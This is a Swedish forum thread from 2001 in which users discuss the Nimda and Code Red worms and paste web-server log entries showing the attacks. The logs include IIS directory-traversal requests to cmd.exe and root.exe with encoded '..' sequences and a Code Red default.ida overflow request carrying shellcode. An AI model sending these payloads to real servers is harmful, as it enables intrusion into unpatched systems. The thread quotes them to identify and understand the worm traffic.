webForumDet fria alternativet

Mer attacker

Datasäkerhet

10 svar · 499 visningar · startad av emission

Medlem sedan dec. 19996 721 inlägg
Frågan#1

http://www.nipc.gov/warnings/advisories/2001/01-021.htm
http://slashdot.org/article.pl?sid=01/09/18/151203&mode=nested

------------------
/emission
If you see someone without a smiley, give them your colon.

Medlem sedan feb. 20001 050 inlägg
#2

Jo man får fett med såna här i sin Apache logg ;)

213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 272
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 270
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
213.11.168.2 - - [18/Sep/2001:21:58:08 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 277
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 277
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
213.11.168.2 - - [18/Sep/2001:21:58:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294

Medlem sedan sep. 20001 124 inlägg
#3

Jag är rädd för att jag kan ha något att göra med den här prylen, hur otroligt det än kan låta. För någon vecka sedan uttrycke jag min avsky mot dessa idioter som inte hade något bättre för sig, och listade upp exakt vad de gjorde fel. Ett av felen - enbart rikta in sig på ett säkerhetshål - verkar vara ändrat här. Denna mask utnyttjar en rad kända buggar som förhoppningsvis ska vara patchade i de flesta maskiner med IIS, och kan även skicka filer till IE om det vill sig riktigt illa.

Som en kompis sade: virus-tillverkare behöver inte hjälp från proffs. Tror jag ska hålla käften om svagheter i virus hädanefter...

------------------
Hollowhead - levererar din dagliga dos av nyttig hårdrock!

Medlem sedan maj 20018 027 inlägg
#4

Jag undrar lite över vad de försöker komma åt. Det ser ju ut som om anropen försöker komma åt "c:\winnt\system32\cmd.exe". Men brukar en webserver verkligen ge åtkomst åt de filerna? Jag trodde man satte en separat rotkatalog för webservern, och sedan skulle användarna bara komma åt filer i den katalogen samt underliggande kataloger, och absolut inga i "winnt". Jag har visserligen för mig att det har talats om någon bugg som skulle ge sådan åtkomst, men det var länge sedan. Det vore intressant om någon kunde ge mig lite klarhet i det här.

Medlem sedan sep. 20001 124 inlägg
#5

Masken går igenom olika svagheter som den känner till. Om den får ett svar från servern som är en directory listing så vet den att just det hålet existerar i servern, och sänder in sig själv genom att utnyttja hålet. När servern väl är infekterad smittar den även ner opatchade IE-installationer som besöker servern, och går på egen hand ut och söker av nätet.

Alla hål som utnyttjas är alltså gamla välkända hål med fixar tillgängliga - de som blir infekterade av denna server har slappat med säkerheten.

------------------
Hollowhead - levererar din dagliga dos av nyttig hårdrock!

Medlem sedan jan. 2000144 inlägg
#6

Menar du att det i tidigare versioner gick att komma åt CMD.EXE på servern genom att skriva "/c/winnt/system32/cmd.exe", tittade i nicclas logg.

Hur kan man leverera en webbserver med så uppenbara säkerhetsluckor. Det är skrämmande tycker jag.

Har dom ingen säkerhetskunnig person som kan granska programmen innan dom släpps?

Förmodligen har dom det nu för tiden (hoppas jag).

Medlem sedan feb. 20001 050 inlägg
#7

Menar du att det i tidigare versioner gick att komma åt CMD.EXE på servern genom att skriva "/c/winnt/system32/cmd.exe"

Nej, denna sökväg "fungerar" bara om din server är infekterad med ett virus, inte annars.

Medlem sedan jan. 2000144 inlägg
#8

Det var ju för väl.

Tittade i loggfilen för idag och förutom alla försök att komma åt root.exe och cmd.exe hittade jag denna rad:

2001-09-19 07:01:47 61.129.52.227 - 213.88.220.58 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 401 -

Undrar vad det är?

[Redigerat av MattiasW den 19 sep 2001]

[Redigerat av MattiasW den 19 sep 2001]

Medlem sedan mars 20007 896 inlägg
#9

default.ida är en fil som Code Red använder. Vet dock inte hur det funkar, om det har försökt krypa in via din server kanske.

------------------
SPiN, bjorne.w@telia.com

-- They pretend to pay me, I pretend to work --

Medlem sedan maj 20018 027 inlägg
#10

Jag roade mig i går kväll med att kolla några av de webservrar som skickar Code Red och Nimda-attacker. Det verkar bara vara Nimda som gäller nu, alla hade den där readme.eml-filen. En del av servrarna hade en defaultsida som förmodligen installeras när man installerar servern. Det får mig att undra om just dessa användare ens vet om att de kör en webserver. Installeras IIS automatiskt med serverversionerna av NT och w2k?

Medlem sedan apr. 200010 782 inlägg
#11

weee.... 23000 träfar *asg* ahh.. härligt att man inte kör IIS på jobb... :)

[r] 73' över dan!!!

------------------

[20:24] <wFare på IRC 1> Någon som tagit EDCL?
[20:25] <wFare på IRC 2> nej, jag tar inte droger!
[20:25] <wFare på IRC 3> Knarkarjävel
[20:25] <wFare på IRC 4> hehe :)

[Redigerat av stoffe-2k den 20 sep 2001]

260 ms totalt · 4 externa anrop · v20260731065814-full.86ec41c2
122 ms — deklarationer (db)
0 ms — hämta statistik (cache)
131 ms — hämta tråd, inlägg och bilagor (db)
127 ms — ändringar (db)